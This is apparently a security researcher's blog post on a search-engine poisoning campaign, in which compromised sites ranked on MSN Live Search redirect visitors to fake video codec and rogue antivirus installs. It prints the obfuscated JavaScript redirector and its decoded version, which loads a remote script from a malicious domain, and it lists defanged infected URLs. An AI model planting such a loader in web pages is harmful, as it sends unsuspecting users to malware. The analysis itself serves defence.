Malware Database

Hi there, this is my first post on the blog and I’ll be blogging about malware pages disguised as good results on the MSN livesearch engine. On the past weeks I have detected close to one thousand infected servers, each one of them hosting over 2000 bad HTML pages, currently being returned to the users via MSN.

This is the way the infection happens: A user performs a search on MSN live search, and depending on his luck, some malicious web sites are returned. The brief description displayed from the search results page may indicate that the contents of the website could be a good match for what the user is looking for, but he will never see the page once the link is clicked…

On those malicious pages, there is some more or less random text (but the text can be somewhat targeted against certain keywords, or just stolen from real websites) But on the top of the page, an encrypted script will automatically redirect the user trhough a server in Russia that on the first visit will ask the user to install a video codec to view a video of what he was looking for.

I have identified over 1000 web sites, each with close to 3000 html pages. The variables on the script and the “keys” to decrypt it vary between sites, making detection harder. If you visit one of those sites directly (no referer) the site will respond with an apparent 404 – Not found message… but looking at the source code of the page you can easily see the full real page and script. This is a trick to make detection even harder as it’s very easy to think that the page is actually down.

Do you want to see some of them?

Open MSN.COM and do a search for acelge.html. Now, this is not how a normal user will get to the bad site, the user would have been searching for, say, “Movies in Anchorage, AK”. Be careful, don’t click on the links unless you like to be infected!

MSN returns the results as below:

Movies In Anchorage Ak, Area Movie Theaters | Local Showtimes and …
in Anchorage, AK, Result 1 – 9 of 9. Blockbuster Movies · Map, 1.30 miles. (907) 277-8525. Anchorage, AK 99501. Movie Theaters in Anchorage, AK Get Ratings & Reviews on Movie …

hxxp://www.zirdum.net/photos/Sanja/pics/acelge.html · Cached page
Unborn Babies are exposed in the womb to synthetic chemicals.
23 April 2003. Unborn baby International. Unborn babies are exposed in the womb to synthetic. Scanning Healthcare is vital for Image for wassily results doctors to help track the …

neurosurgeon.com/database/questions/995385288/cache/acelge.html · Cached page
Room Tour clean
you do live with the duke dirt?? then you of need the queen of

audioeducator.com/uploads/downloadsfiles/images/acelge.html · Cached page
Murray Feiss MF WB1220 Wall Washer Sconce Wrought Iron from the

By looking for the page name we inmediately got several relevant results. A normal user would have those results mixed among the real ones. Just by looking at the link we can determine that they all have something in common: All the bad pages are located deep on the web server, usually inside an images, pics, thumbs or cached folder. We can notice also that the URL themselves dont seem to be related to the information searched…

If we where to click on the link, our browser would never get to see the page. A script similar to this one would take over:

var q = “movies in anchorage ak”;
function B(nW,g){if(!g){g=’q<Gzd`@=j?EUTWrLb5i6(+Pw_pky3)vKFn7sRV$D{ZB[JSe.Hl^Y*!:fOIN;u8mo’;}var k;var EA=”;for(var r=0;r<nW.length;r+=4){k=(g.indexOf(nW.charAt(r))&255)<<18|(g.indexOf(nW.charAt(r+1))&255)<<12|(g.indexOf(nW.charAt(r+2))&255)<<(6)|g.indexOf(nW.charAt(r+3))&255;EA+=String.fromCharCode((k&16711680)>>16,(k&65280)>>8,k&255);}eval(EA);}B(‘p@8s)P!VyDbe)f?Z)@({?YlY_^3[?f?Z3=bF3f?sLi?{)=5Hr7u._:Te3:+n3$W{UD?V3f+J)=Te)=?!3fbe)$VV)^I{)@!JU$VeU$Ve)=?!3fbe_:T._:8!yDbekDTo3z!Y):{HT6_$36*DEfd[?^p^Li3[pwWs_w<VE@5._f+SpPI*UD?Vp$+^3$+^EiJDjsOuUfWs?^JD3$VH)zODE6JF’);

And if decoded, this is what actually does:

document.write(‘<sc’+'ript src=”hxxp://cc.search.results.trust.view.html.in.intrust.cc/count.js?p=swj016&q=’+q+’&r=’+escape(document.referrer)+’”></sc’+'ript>’);

There you can see the first destination on your journey to malware land. A script on the other side will decide what to do with you: Is this your first visit? then you need to view our video, install the needed video codec. have you been here before? Then buy our super-duper antivirs, because by now, you should already infected… what? you are still caming back? mmm… not sure about why, let’s give you some fake search results. The results may land you on real ebay, google or other web sites, but on the way there they will divert your browser to china or russia to have it checked, then land you on the real web site without you ever noticing.

The truth is that the script on the other side can be updated any time they want, depending on their current campaign. Their rogue search results will keep sending a fresh wave of users every day, while their malicious contents can be updated dynamically as needed. Oh, if you go there directly you wont see anything. Even if you open one of the pages directly you will still not see anything unless you actually display the source.

On my last test, I got prompted to install the “Microsoft Data Access – Remote Data Services…” from “Microsoft Corporation”. And it was probably the real thing, but I bet ya it was not the latest one (it was probably one with a hole big enought to drive a truck of vodka through) I was also offered to run PCPrivacyCleaner and to watch free spy cams, all that while my computer was scanned for vulnerabilities…

User education and having your computer up to date is the best protection agains all kind of exploits. And not only windows updates: Any software on the computer that can be updated should be updated. Realplayer, macromedia flash, adobe… they are all susceptible to exploits and should be kept up to date. The bad guys are looking for the unpatched versions actively, and they will find yours. Always double check where the link is going to take you before you click.